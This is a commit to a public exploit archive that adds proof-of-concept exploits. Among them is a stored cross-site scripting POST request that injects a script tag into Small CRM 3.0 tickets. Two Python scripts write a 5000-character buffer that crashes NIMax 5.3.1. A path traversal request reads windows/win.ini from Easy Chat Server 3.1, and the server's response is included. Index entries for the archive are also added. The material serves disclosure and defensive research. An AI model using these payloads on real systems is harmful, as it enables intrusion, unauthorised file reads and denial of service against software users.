DB: 2021-10-22

5 changes to exploits/shellcodes NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC) NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC) Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)
2021-10-22 05:02:17 +00:00 · 2021-10-22 05:02:17 +00:00 · ae2adf08f1
commit ae2adf08f1
parent 2ee235ed78
6 changed files with 135 additions and 1 deletions
--- a/exploits/php/webapps/50435.txt
+++ b/exploits/php/webapps/50435.txt
@ -0,0 +1,27 @@
+# Exploit Title: Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)
+# Date: 20/10/2021
+# Exploit Author: Ghuliev
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/small-crm-php/
+# Version: 3.0
+# Tested on: Server: Ubuntu
+
+When a user or admin creates a ticket, we can inject javascript code into
+ticket.
+
+POST /crm/create-ticket.php HTTP/1.1
+Host: IP
+Content-Length: 79
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://IP
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://IP/crm/create-ticket.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,az;q=0.8,ru;q=0.7
+
+subject=aa&tasktype=Select+your+Task+Type&priority=&description=</textarea><script>alert(1)</script>&send=Send
--- a/exploits/windows/dos/50433.py
+++ b/exploits/windows/dos/50433.py
@ -0,0 +1,27 @@
+# Exploit Title: NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)
+# Date: 24/06/2021
+# Exploit Author: LinxzSec
+# Vulnerability: Local Denial of Service (DoS)
+# Vendor Homepage: https://www.ni.com/en-gb.html
+# Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB
+# Tested Version: 5.3.1f0
+# Tested On: Windows 10 Pro x64
+
+'''[ POC ]
+1 - Copy printed "AAAAA..." string from "nimax.txt"
+2 - Open NIMax.exe
+3 - Right click "Remote systems" and press "Create New"
+4 - Select "Remote VISA System" and press "Next"
+5 - Paste clipboard in "Remote VISA System Address"
+6 - Press finish and DoS will occur
+'''
+
+buffer = "\x41" * 5000
+
+try:
+    f = open("nimax.txt", "w")
+    f.write(buffer)
+    f.close()
+    print("[+] File created!")
+except:
+    print("[+] File could not be created!")
--- a/exploits/windows/dos/50434.py
+++ b/exploits/windows/dos/50434.py
@ -0,0 +1,31 @@
+# Exploit Title: NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)
+# Date: 24/06/2021
+# Exploit Author: LinxzSec
+# Vulnerability: Local Denial of Service (DoS)
+# Vendor Homepage: https://www.ni.com/en-gb.html
+# Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB
+# Tested Version: 5.3.1f0
+# Tested On: Windows 10 Pro x64
+
+'''[ POC ]
+1 - Copy printed "AAAAA..." string from "nimax.txt"
+2 - Open NIMax.exe
+3 - Drop down "My System" then drop down "Software"
+5 - Locate "NI-VISA 5.2" and select it
+6 - Open the "VISA Options" tab
+7 - Drop down "General settings"
+8 - Select "Aliases"
+9 - Select "Add alias"
+10 - Paste string from "nimax.txt" into "Resource name"
+11 - Just put a single character in the alias and press "ok", DoS will occur
+'''
+
+buffer = "\x41" * 5000
+
+try:
+    f = open("nimax.txt", "w")
+    f.write(buffer)
+    f.close()
+    print("[+] File created!")
+except:
+    print("[+] File could not be created!")
--- a/exploits/windows/local/50431.txt
+++ b/exploits/windows/local/50431.txt
@ -1,6 +1,6 @@
 # Exploit Title: Macro Expert 4.7 - Unquoted Service Path
 # Exploit Author: Mert DAŞ
-# Version: 3.11.8
+# Version: 4.7
 # Date: 20.10.2021
 # Vendor Homepage: http://www.macro-expert.com/
 # Tested on: Windows 10
--- a/exploits/windows/webapps/50437.txt
+++ b/exploits/windows/webapps/50437.txt
@ -0,0 +1,45 @@
+# Exploit Title: Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read
+# Date: 11 October 2021
+# Exploit Author: z4nd3r
+# Vendor Homepage: http://www.echatserver.com/
+# Software Link: http://www.echatserver.com/
+# Version: 3.1
+# Tested on: Windows 10 Pro Build 19042, English
+#
+# Description:
+# The web server allows for directory traversal and reading of arbitrary files on the
+#  system, given that the account running the server can access the target file.
+
+
+Proof-of-concept using Burp:
+
+Request:
+
+GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
+Host: 192.168.50.52
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+----------------------------------------
+
+Response:
+
+HTTP/1.0 200 OK
+Date: Thu, 21 Oct 2021 14:55:57 GMT
+Server: Easy Chat Server/1.0
+Accept-Ranges: bytes
+Content-Length: 92
+Connection: close
+Content-Type: text/html
+
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6769,6 +6769,8 @@ id,file,description,date,author,type,platform,port
 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",1970-01-01,"Guillaume PETIT",dos,multiple,
 49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",1970-01-01,Enesdex,dos,hardware,
 50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows,
+50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
+50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@ -44378,4 +44380,6 @@ id,file,description,date,author,type,platform,port
 50428,exploits/multiple/webapps/50428.txt,"myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)",1970-01-01,"RedTeam Pentesting GmbH",webapps,multiple,
 50429,exploits/php/webapps/50429.py,"Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)",1970-01-01,"Chase Comardelle",webapps,php,
 50430,exploits/hardware/webapps/50430.txt,"SonicWall SMA 10.2.1.0-17sv - Password Reset",1970-01-01,"Jacob Baines",webapps,hardware,
+50437,exploits/windows/webapps/50437.txt,"Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read",1970-01-01,z4nd3r,webapps,windows,
 50432,exploits/php/webapps/50432.txt,"Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation",1970-01-01,"Oscar Gil Gutierrez",webapps,php,
+50435,exploits/php/webapps/50435.txt,"Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,Ghuliev,webapps,php,